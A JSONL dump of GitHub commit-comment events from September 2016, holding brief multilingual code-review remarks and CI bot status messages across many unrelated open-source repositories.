{"id":"4612410246","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157675,"position":59,"line":59,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:45:24Z","updated_at":"2016-09-24T11:45:24Z","body":"```php\r\npublic function checkSizePX($file)\r\n{\r\n    $image = new Imagick($file->getTempName());\r\n\r\n    if (($image->getWidth() & $this->minImageWidth) > $this->minImageWidth) {\r\n        $this->flashS->error(\r\n            \"Ширина изображения должны быть больше {$this->minImageWidth}\"\r\n        );\r\n\r\n        return false;\r\n    }\r\n\r\n    if (($image->getHeight() & $this->minImageHeight) > $this->minImageHeight) {\r\n        $this->flashS->error(\r\n            \"Высота изображения должны быть больше {$this->minImageWidth}\"\r\n        );\r\n\r\n        return false;\r\n    }\r\n\r\n    return true;\r\n}\r\n```\r\n\r\nНо вообще-то это выносят в валидатор"}},"created_at":"2016-09-24T11:45:24Z"}
{"id":"4612410502","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19157677,"position":null,"line":null,"path":null,"commit_id":"27f7b18e2d271affd10c1467ed1906da6aa7b43e","created_at":"2016-09-24T11:45:37Z","updated_at":"2016-09-24T11:45:37Z","body":":+1: :+1: :+1: "}},"created_at":"2016-09-24T11:45:37Z"}
{"id":"4612411259","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19157681,"position":null,"line":null,"path":null,"commit_id":"9b2a611994755a31169f90c2a497120ff326a6dc","created_at":"2016-09-24T11:46:25Z","updated_at":"2016-09-24T11:46:25Z","body":"Это мелочи. Самое сложное впереди. :)\r\nIt's the little things. The hardest part ahead. :)"}},"created_at":"2016-09-24T11:46:25Z"}
{"id":"4612411391","type":"CommitCommentEvent","actor":{"login":"DendyTheElephant"},"repo":{"name":"DendyTheElephant/PixPhetamine"},"payload":{"comment":{"id":19157682,"position":null,"line":null,"path":null,"commit_id":"8af2e16033a8d4c84b06de84de0c2e8349d8b2c5","created_at":"2016-09-24T11:46:32Z","updated_at":"2016-09-24T11:46:32Z","body":"At this point, the depth texture (on the final pass) is empty (or something else?) ... \r\nThis needs to be fixed soon, but the issue may happen because of bad GLenum or bad parametrization in the CFrameBuffer for the depth attachment!"}},"created_at":"2016-09-24T11:46:32Z"}
{"id":"4612411526","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157683,"position":null,"line":null,"path":null,"commit_id":"77595ff35ad3f9bbfc0bb7ca74e499ff94f81674","created_at":"2016-09-24T11:46:39Z","updated_at":"2016-09-24T11:46:39Z","body":"os_2_0_fix_static_build (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-24T11:46:39Z"}
{"id":"4612412985","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157687,"position":59,"line":59,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:48:02Z","updated_at":"2016-09-24T11:48:02Z","body":"Я думал об этом, но пока руки не добрались до мана (если он вообще есть). Как разберусь обязательно все чеки из компонента перенесу в валидатор."}},"created_at":"2016-09-24T11:48:02Z"}
{"id":"4612414477","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157690,"position":null,"line":null,"path":null,"commit_id":"77595ff35ad3f9bbfc0bb7ca74e499ff94f81674","created_at":"2016-09-24T11:49:17Z","updated_at":"2016-09-24T11:49:17Z","body":"os_2_0_fix_static_build (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-24T11:49:17Z"}
{"id":"4612414959","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19157691,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-24T11:49:46Z","updated_at":"2016-09-24T11:49:46Z","body":"Probably there is an encoding issue.  The en_GB.info has \"fsa.dict.encoding=iso-8859-2\", but the hunspell files are in utf-8. "}},"created_at":"2016-09-24T11:49:46Z"}
{"id":"4612415475","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157696,"position":43,"line":43,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:50:15Z","updated_at":"2016-09-24T11:50:15Z","body":"`else` не нужен тут "}},"created_at":"2016-09-24T11:50:15Z"}
{"id":"4612415610","type":"CommitCommentEvent","actor":{"login":"ilvalle"},"repo":{"name":"web2py/web2py"},"payload":{"comment":{"id":19157698,"position":5,"line":7,"path":"applications/admin/views/web2py_ajax.html","commit_id":"e5355b5b12a7de1ee93bee6ab91fd2b79260706a","created_at":"2016-09-24T11:50:23Z","updated_at":"2016-09-24T11:50:23Z","body":"this broke admin editor because the A element contains double quotes.\r\n```var ajax_error_500 = \"An error occured, please <a href=\"/admin/default/edit/welcome/controllers/default.py?id=controllers__default__py\">reload</a> the page\"```"}},"created_at":"2016-09-24T11:50:23Z"}
{"id":"4612415629","type":"CommitCommentEvent","actor":{"login":"yamoo9"},"repo":{"name":"yamoo9/JJ_CAMP"},"payload":{"comment":{"id":19157699,"position":null,"line":null,"path":null,"commit_id":"2dc8722423ff7a23c3b53bbf1ffa36ad2989a055","created_at":"2016-09-24T11:50:24Z","updated_at":"2016-09-24T11:50:24Z","body":"\r\n아래 코드는 사용자가 `target` 인자를 전달했을 때 올바른 값인지 검토하기 위함이고,\r\n\r\n```js\r\nif( target && target.nodeType !== 1 ) { throw new Error('세번째 인자는 요소노드여야 한다.'); }\r\n```\r\n\r\n아래 코드는 `taret` 전달인자가 있을 경우에만 작동되어야 하는 코드이기 때문입니다.\r\n\r\n```js\r\nif ( target ) {\r\n  target.parentNode.insertBefore(headline, target);\r\n}\r\n```"}},"created_at":"2016-09-24T11:50:24Z"}
{"id":"4612415714","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19157700,"position":null,"line":null,"path":null,"commit_id":"c152a5e6547ab0b46d79b3cf47ec5877ce834597","created_at":"2016-09-24T11:50:29Z","updated_at":"2016-09-24T11:50:29Z","body":"Right. Not as funny as \"Vim'gol the Vile (NPC 22911) announces fireworks at 6 PM instead of saying his aggro text.\" which I found in issue #16882 ([DB/creature_text: Grim(oire) Business, wrong creature text](16882)) though. 😄"}},"created_at":"2016-09-24T11:50:29Z"}
{"id":"4612415740","type":"CommitCommentEvent","actor":{"login":"chosen1st"},"repo":{"name":"chosen1st/2016LinuxCPP"},"payload":{"comment":{"id":19157701,"position":null,"line":null,"path":null,"commit_id":"b4aae52b174e89c3a02d6c202c3150fb9ab93c2c","created_at":"2016-09-24T11:50:31Z","updated_at":"2016-09-24T11:50:31Z","body":"但是其实原来那个方法也挺巧的，不用引入iomanip库"}},"created_at":"2016-09-24T11:50:31Z"}
{"id":"4612415761","type":"CommitCommentEvent","actor":{"login":"twhess"},"repo":{"name":"twhess/website"},"payload":{"comment":{"id":19157702,"position":3,"line":3,"path":"lipsum.txt","commit_id":"225b5bf9350dd2e0aaba1726d94a86d5024f2306","created_at":"2016-09-24T11:50:32Z","updated_at":"2016-09-24T11:50:32Z","body":"##Lipsum Really??\r\n\r\nSo we really were not able to find a better filler text?"}},"created_at":"2016-09-24T11:50:32Z"}
{"id":"4612416773","type":"CommitCommentEvent","actor":{"login":"cliveb"},"repo":{"name":"gdg-x/hoverboard"},"payload":{"comment":{"id":19157703,"position":null,"line":null,"path":null,"commit_id":"7f9888887c0b4ddd7c1518d5c38eb90501c1dd22","created_at":"2016-09-24T11:51:30Z","updated_at":"2016-09-24T11:51:30Z","body":"I've not PR'd master from fork before. Trying again. "}},"created_at":"2016-09-24T11:51:30Z"}
{"id":"4612416777","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157704,"position":109,"line":109,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:51:31Z","updated_at":"2016-09-24T11:51:31Z","body":"из функций принято возвращать (return) значения, а не вываливать в вывод (echo)"}},"created_at":"2016-09-24T11:51:31Z"}
{"id":"4612417578","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157804,"position":43,"line":43,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:52:10Z","updated_at":"2016-09-24T11:52:10Z","body":"Согласен"}},"created_at":"2016-09-24T11:52:10Z"}
{"id":"4612419417","type":"CommitCommentEvent","actor":{"login":"evgfilim1"},"repo":{"name":"mrsteyk/itcat_carmabot"},"payload":{"comment":{"id":19157806,"position":159,"line":93,"path":"bot.py","commit_id":"58824c2c08aacc6e8846a8ae449b658c4f1316c8","created_at":"2016-09-24T11:54:00Z","updated_at":"2016-09-24T11:54:00Z","body":"Что тебе в этой строке не нравится?"}},"created_at":"2016-09-24T11:54:00Z"}
{"id":"4612419586","type":"CommitCommentEvent","actor":{"login":"twhess"},"repo":{"name":"twhess/website"},"payload":{"comment":{"id":19157807,"position":null,"line":null,"path":null,"commit_id":"225b5bf9350dd2e0aaba1726d94a86d5024f2306","created_at":"2016-09-24T11:54:07Z","updated_at":"2016-09-24T11:54:07Z","body":"###Lipsum Really??\r\n\r\nSo we really were not able to find a *better* filler text?"}},"created_at":"2016-09-24T11:54:07Z"}
{"id":"4612420831","type":"CommitCommentEvent","actor":{"login":"gamalelkomy"},"repo":{"name":"MKLab-ITI/CUDA"},"payload":{"comment":{"id":19157810,"position":null,"line":null,"path":null,"commit_id":"9c2a156d2ccd537433c98e5dfdf7403429647f47","created_at":"2016-09-24T11:55:16Z","updated_at":"2016-09-24T11:55:16Z","body":"Hello @tpapaz,\r\nI am trying to use your implementation of the SVM on GPU with the same dataset but there is no acceleration,\r\nPlease advice."}},"created_at":"2016-09-24T11:55:16Z"}
{"id":"4612421134","type":"CommitCommentEvent","actor":{"login":"evgfilim1"},"repo":{"name":"mrsteyk/itcat_carmabot"},"payload":{"comment":{"id":19157811,"position":276,"line":133,"path":"bot.py","commit_id":"58824c2c08aacc6e8846a8ae449b658c4f1316c8","created_at":"2016-09-24T11:55:30Z","updated_at":"2016-09-24T11:55:30Z","body":"Потому что так надо по документации"}},"created_at":"2016-09-24T11:55:30Z"}
{"id":"4612421459","type":"CommitCommentEvent","actor":{"login":"evgfilim1"},"repo":{"name":"mrsteyk/itcat_carmabot"},"payload":{"comment":{"id":19157812,"position":293,"line":150,"path":"bot.py","commit_id":"58824c2c08aacc6e8846a8ae449b658c4f1316c8","created_at":"2016-09-24T11:55:49Z","updated_at":"2016-09-24T11:55:49Z","body":"Потому что так надо по документации x2"}},"created_at":"2016-09-24T11:55:49Z"}
{"id":"4612422269","type":"CommitCommentEvent","actor":{"login":"Kyslik"},"repo":{"name":"rtconner/laravel-tagging"},"payload":{"comment":{"id":19157815,"position":null,"line":null,"path":null,"commit_id":"72ff761eafc30b4f8a58ef292de353e8ad26913a","created_at":"2016-09-24T11:56:31Z","updated_at":"2016-09-24T11:56:31Z","body":"I was tracking this for so long... why is there no 2.2.1 with this already :("}},"created_at":"2016-09-24T11:56:31Z"}
{"id":"4612423051","type":"CommitCommentEvent","actor":{"login":"Yakovlev-Melarn"},"repo":{"name":"Yakovlev-Melarn/directantic"},"payload":{"comment":{"id":19157816,"position":109,"line":109,"path":"directantic/app/components/Images.php","commit_id":"6953cb6a1e3edd6b92fb24ca3c9b1b914f818745","created_at":"2016-09-24T11:57:17Z","updated_at":"2016-09-24T11:57:17Z","body":"Был вариант с return который наплодил из за этого отдельный файл. Я посчитал расточительно это. Но тогда метод был приватным внутри контроллера.  Затем, я подумал неплохо бы вынести эту всю срань в отдельный компонент, а когда вынес забыл это причесать. Разумеется будет return ибо не всегда и везде надо вываливать результат подгруженой картинки в вывод. Исправлю эти моменты и повсеместно уберу вызовы $this->view - они в компоненте лишние - за вывод должен отвечать контроллер, а не компонент."}},"created_at":"2016-09-24T11:57:17Z"}
{"id":"4612423299","type":"CommitCommentEvent","actor":{"login":"NaikSoftware"},"repo":{"name":"foomoto/StompProtocolAndroid"},"payload":{"comment":{"id":19157819,"position":null,"line":null,"path":null,"commit_id":"070f27405e75e73a5b7b75f423f7d02529147381","created_at":"2016-09-24T11:57:32Z","updated_at":"2016-09-24T11:57:32Z","body":"Thanks for fix this, will be added to next release"}},"created_at":"2016-09-24T11:57:32Z"}
{"id":"4612425369","type":"CommitCommentEvent","actor":{"login":"daniel00"},"repo":{"name":"daniel00/AlgoStudy"},"payload":{"comment":{"id":19157822,"position":40,"line":40,"path":"01_PrimeAndPalindrome/PrimeAndPalindrome.cpp","commit_id":"8da07f1b0263371e6a26d3940c386a3d437d5749","created_at":"2016-09-24T11:59:23Z","updated_at":"2016-09-24T11:59:23Z","body":"test comment"}},"created_at":"2016-09-24T11:59:23Z"}
{"id":"4612426179","type":"CommitCommentEvent","actor":{"login":"evgfilim1"},"repo":{"name":"mrsteyk/itcat_carmabot"},"payload":{"comment":{"id":19157825,"position":58,"line":40,"path":"bot.py","commit_id":"58824c2c08aacc6e8846a8ae449b658c4f1316c8","created_at":"2016-09-24T12:00:02Z","updated_at":"2016-09-24T12:00:02Z","body":"Зачем /crack??! Я ж тебя не крякаю (хотя мог бы)"}},"created_at":"2016-09-24T12:00:02Z"}
{"id":"4612426914","type":"CommitCommentEvent","actor":{"login":"lacieliz"},"repo":{"name":"lacieliz/testGit"},"payload":{"comment":{"id":19157826,"position":1,"line":1,"path":"test","commit_id":"16f3b43dc0cc54cffbbee08f768b744d067a6ab2","created_at":"2016-09-24T12:00:25Z","updated_at":"2016-09-24T12:00:25Z","body":"소스이상해"}},"created_at":"2016-09-24T12:00:25Z"}
{"id":"4612427119","type":"CommitCommentEvent","actor":{"login":"karandesai-96"},"repo":{"name":"karandesai-96/Magneto-Mania"},"payload":{"comment":{"id":19157829,"position":36,"line":48,"path":"core/src/com/sdsmdg/kd/gameplay/objects/Bullet.java","commit_id":"63a8bd286ba1fbc240430cc7f87a71fef74e06cc","created_at":"2016-09-24T12:00:34Z","updated_at":"2016-09-24T12:00:34Z","body":"Tiread of `Vector2.angle()` already ? :stuck_out_tongue: "}},"created_at":"2016-09-24T12:00:34Z"}
{"id":"4612428609","type":"CommitCommentEvent","actor":{"login":"karandesai-96"},"repo":{"name":"karandesai-96/Magneto-Mania"},"payload":{"comment":{"id":19157831,"position":48,"line":58,"path":"core/src/com/sdsmdg/kd/gameplay/objects/Bullet.java","commit_id":"63a8bd286ba1fbc240430cc7f87a71fef74e06cc","created_at":"2016-09-24T12:01:48Z","updated_at":"2016-09-24T12:01:48Z","body":"Use `muladd` method here. Press a `Ctrl + B` and you'll discover there are two different signatures for `muladd`."}},"created_at":"2016-09-24T12:01:48Z"}
{"id":"4612428915","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19157855,"position":null,"line":null,"path":null,"commit_id":"d394cf210e392fd5e433cb9a89495641f3acaccc","created_at":"2016-09-24T12:02:01Z","updated_at":"2016-09-24T12:02:01Z","body":"@snicolet Yes, that's also a reasonable possibility. Feel free to submit another test in that direction.\r\nIn meantime I will prepare a branch with another idea of recognizing discoverings in most cases,\r\nas soon I have pushed I will show you this idea..."}},"created_at":"2016-09-24T12:02:01Z"}
{"id":"4612428923","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19157856,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-24T12:02:01Z","updated_at":"2016-09-24T12:02:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 63](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14216&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-24T12:02:01Z"}
{"id":"4612429546","type":"CommitCommentEvent","actor":{"login":"karandesai-96"},"repo":{"name":"karandesai-96/Magneto-Mania"},"payload":{"comment":{"id":19157858,"position":61,"line":71,"path":"core/src/com/sdsmdg/kd/gameplay/objects/Bullet.java","commit_id":"63a8bd286ba1fbc240430cc7f87a71fef74e06cc","created_at":"2016-09-24T12:02:29Z","updated_at":"2016-09-24T12:02:29Z","body":"I think we don't need this."}},"created_at":"2016-09-24T12:02:29Z"}
{"id":"4612430108","type":"CommitCommentEvent","actor":{"login":"karandesai-96"},"repo":{"name":"karandesai-96/Magneto-Mania"},"payload":{"comment":{"id":19157859,"position":61,"line":71,"path":"core/src/com/sdsmdg/kd/gameplay/objects/Bullet.java","commit_id":"63a8bd286ba1fbc240430cc7f87a71fef74e06cc","created_at":"2016-09-24T12:02:58Z","updated_at":"2016-09-24T12:02:58Z","body":"... with a condition that there isn't any acceleration.\r\n"}},"created_at":"2016-09-24T12:02:58Z"}
{"id":"4612430376","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":19157860,"position":5,"line":22,"path":"downloads/platform.md","commit_id":"ab16b685c09c8611a108ed3d084e112bc683acf6","created_at":"2016-09-24T12:03:12Z","updated_at":"2016-09-24T12:03:12Z","body":"someone was reporting recently that running from the image doesn't work"}},"created_at":"2016-09-24T12:03:12Z"}
{"id":"4612430887","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19157862,"position":null,"line":null,"path":null,"commit_id":"39f5831f0f518df07418758127db42b173b1804c","created_at":"2016-09-24T12:03:41Z","updated_at":"2016-09-24T12:03:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 63](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14216&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:40"}},"created_at":"2016-09-24T12:03:41Z"}
{"id":"4612430902","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":19157864,"position":11,"line":28,"path":"downloads/platform.md","commit_id":"ab16b685c09c8611a108ed3d084e112bc683acf6","created_at":"2016-09-24T12:03:42Z","updated_at":"2016-09-24T12:03:42Z","body":"\"These platform specific binaries\" sounds like you're talking about the generic linux binaries."}},"created_at":"2016-09-24T12:03:42Z"}
{"id":"4612431847","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19157867,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-24T12:04:32Z","updated_at":"2016-09-24T12:04:32Z","body":"@chanmank 你还会下吗 1080的"}},"created_at":"2016-09-24T12:04:32Z"}
{"id":"4612432213","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/FreeMVD_WorkFlow"},"payload":{"comment":{"id":19157869,"position":null,"line":null,"path":null,"commit_id":"690b785399357df7d0a875fcea8b61e26b4dff7d","created_at":"2016-09-24T12:04:52Z","updated_at":"2016-09-24T12:04:52Z","body":"passes!... d325a1485a63820b1632e9b729b75036289f9a14"}},"created_at":"2016-09-24T12:04:52Z"}
{"id":"4612432341","type":"CommitCommentEvent","actor":{"login":"shiva04"},"repo":{"name":"shiva04/webdev"},"payload":{"comment":{"id":19157870,"position":null,"line":null,"path":null,"commit_id":"12807eef867445f5dc60b79a0df23c55a2bd43c2","created_at":"2016-09-24T12:04:59Z","updated_at":"2016-09-24T12:04:59Z","body":"Wasn't necessary?"}},"created_at":"2016-09-24T12:04:59Z"}
{"id":"4612433444","type":"CommitCommentEvent","actor":{"login":"vlad0209"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19157874,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-24T12:05:58Z","updated_at":"2016-09-24T12:05:58Z","body":"It must work with quanity > 1. I will test it. And I will add saving links to old method when test support for old Woocommerce versions."}},"created_at":"2016-09-24T12:05:58Z"}
{"id":"4612433645","type":"CommitCommentEvent","actor":{"login":"ViralBShah"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":19157875,"position":11,"line":28,"path":"downloads/platform.md","commit_id":"ab16b685c09c8611a108ed3d084e112bc683acf6","created_at":"2016-09-24T12:06:10Z","updated_at":"2016-09-24T12:06:10Z","body":"Ah - should it be \"These linux distribution specific binaries below\"?"}},"created_at":"2016-09-24T12:06:10Z"}
{"id":"4612434291","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19157876,"position":null,"line":null,"path":null,"commit_id":"e8f38493b903a5c67a9d327e2ec975869490bda4","created_at":"2016-09-24T12:06:50Z","updated_at":"2016-09-24T12:06:50Z","body":"Thx"}},"created_at":"2016-09-24T12:06:50Z"}
{"id":"4612434399","type":"CommitCommentEvent","actor":{"login":"rohanjain1407"},"repo":{"name":"palipind/wedding-organizer"},"payload":{"comment":{"id":19157877,"position":23,"line":23,"path":"weddingApi/pom.xml","commit_id":"6b78e8aa4444cd7ba31db8026029158f2c0bacf6","created_at":"2016-09-24T12:06:55Z","updated_at":"2016-09-24T12:06:55Z","body":"Do you see any any need to mention this? Also what java version are you using?"}},"created_at":"2016-09-24T12:06:55Z"}
{"id":"4612435229","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19157880,"position":null,"line":null,"path":null,"commit_id":"9b4286064f59d8e22350601988ad08d0e3b420b8","created_at":"2016-09-24T12:07:44Z","updated_at":"2016-09-24T12:07:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WXOICafOQQ2dKYPU7Na1sA"}},"created_at":"2016-09-24T12:07:44Z"}
{"id":"4612435532","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19157881,"position":null,"line":null,"path":null,"commit_id":"174951b192a727c50b4d189ceeb4177a189d4eb5","created_at":"2016-09-24T12:08:04Z","updated_at":"2016-09-24T12:08:04Z","body":"You can't detect the situation when the /usr lives on other filesystem. And if someone compiles their system with this options, and installs or upgrades the with separated /usr partition, then he or she get a non working system."}},"created_at":"2016-09-24T12:08:04Z"}
{"id":"4612435745","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":19157882,"position":11,"line":28,"path":"downloads/platform.md","commit_id":"ab16b685c09c8611a108ed3d084e112bc683acf6","created_at":"2016-09-24T12:08:16Z","updated_at":"2016-09-24T12:08:16Z","body":"Don't say \"these\" if you're not talking about the same thing as the sentence before.\r\n\"The following distribution-specific packages\""}},"created_at":"2016-09-24T12:08:16Z"}
{"id":"4612436986","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19157883,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-24T12:09:31Z","updated_at":"2016-09-24T12:09:31Z","body":"See the discussion by Ronald in this forum thread:\r\nhttps://groups.google.com/forum/?fromgroups=#!topic/fishcooking/9mcmjnyqbAQ"}},"created_at":"2016-09-24T12:09:31Z"}
{"id":"4612437122","type":"CommitCommentEvent","actor":{"login":"benoitne"},"repo":{"name":"mkh1973/nagios-eventhandler-cachet"},"payload":{"comment":{"id":19157884,"position":null,"line":null,"path":null,"commit_id":"d156505bdb8db7048a749959cd641150919cc12b","created_at":"2016-09-24T12:09:40Z","updated_at":"2016-09-24T12:09:40Z","body":"thanks for this commit it should definitely go to master! it solve my issue to update my status when incidents are solved.\r\nYou should also do a sed -i 's|CATCHET|CACHET|g' cachet_notify as there is still a typo on CACHET"}},"created_at":"2016-09-24T12:09:40Z"}
{"id":"4612439843","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19157887,"position":null,"line":null,"path":null,"commit_id":"9b4286064f59d8e22350601988ad08d0e3b420b8","created_at":"2016-09-24T12:12:11Z","updated_at":"2016-09-24T12:12:11Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aUxM_uzFT3GLdqEfTDQbjw"}},"created_at":"2016-09-24T12:12:11Z"}
{"id":"4612440617","type":"CommitCommentEvent","actor":{"login":"lattera"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19157890,"position":null,"line":null,"path":null,"commit_id":"174951b192a727c50b4d189ceeb4177a189d4eb5","created_at":"2016-09-24T12:12:53Z","updated_at":"2016-09-24T12:12:53Z","body":"I should document it in `src.conf(5)` that users should not do this if `/usr` is separate."}},"created_at":"2016-09-24T12:12:53Z"}
{"id":"4612442333","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19157895,"position":null,"line":null,"path":null,"commit_id":"3d5f59c8553cbf9b79003afa32df6a1527c4b17d","created_at":"2016-09-24T12:14:21Z","updated_at":"2016-09-24T12:14:21Z","body":"Shouldn't this be \"timingsEnabled && verboseEnabled\"?"}},"created_at":"2016-09-24T12:14:21Z"}
{"id":"4612444992","type":"CommitCommentEvent","actor":{"login":"lukeIam"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19157897,"position":9,"line":53,"path":"main/src/cgeo/geocaching/maps/brouter/BRouter.java","commit_id":"7f6b319e189d23e979bd30c1b2fcb3fb4b7882eb","created_at":"2016-09-24T12:16:43Z","updated_at":"2016-09-24T12:16:43Z","body":"this line can be removed, as \"v\" is always overwritten in L56"}},"created_at":"2016-09-24T12:16:43Z"}
{"id":"4612447596","type":"CommitCommentEvent","actor":{"login":"KravitzLab"},"repo":{"name":"jfeye/fed"},"payload":{"comment":{"id":19157900,"position":null,"line":null,"path":null,"commit_id":"c578856f9d5d29754c56a33216584b8b26bc28aa","created_at":"2016-09-24T12:19:01Z","updated_at":"2016-09-24T12:19:01Z","body":"Hi!  Are you making FED only dispense at certain times of the day?  I'd love to hear how this works out! "}},"created_at":"2016-09-24T12:19:01Z"}
{"id":"4612451875","type":"CommitCommentEvent","actor":{"login":"mitya57"},"repo":{"name":"waylan/Python-Markdown"},"payload":{"comment":{"id":19157903,"position":5,"line":67,"path":"tests/extensions/attr_list.html","commit_id":"5881ae5235de7e8d57703aa33f49ed5fe7b79fee","created_at":"2016-09-24T12:22:52Z","updated_at":"2016-09-24T12:22:52Z","body":"Okay, letting people put the quotes to disambiguate sounds fine to me.\r\n\r\nThough, I want to point out that the previous behavior was less broken than what you thought about it:\r\n\r\n> previously, the regex was parsing the key as `a=b` and the value as `c`\r\n\r\nHere you are incorrect. It was parsing the key as `foo` and the value as `a=b`."}},"created_at":"2016-09-24T12:22:52Z"}
{"id":"4612452033","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"samuraitruong/necro_socket"},"payload":{"comment":{"id":19157904,"position":null,"line":null,"path":null,"commit_id":"856a9173ce9fc36f3b6bc2d3a0fcab2df9023270","created_at":"2016-09-24T12:23:03Z","updated_at":"2016-09-24T12:23:03Z","body":"Awesome!\r\n...\r\n![screenshot_225](https://cloud.githubusercontent.com/assets/4365551/18808417/4019eda8-828c-11e6-836f-4f1a31c95df4.jpg)\r\n"}},"created_at":"2016-09-24T12:23:03Z"}
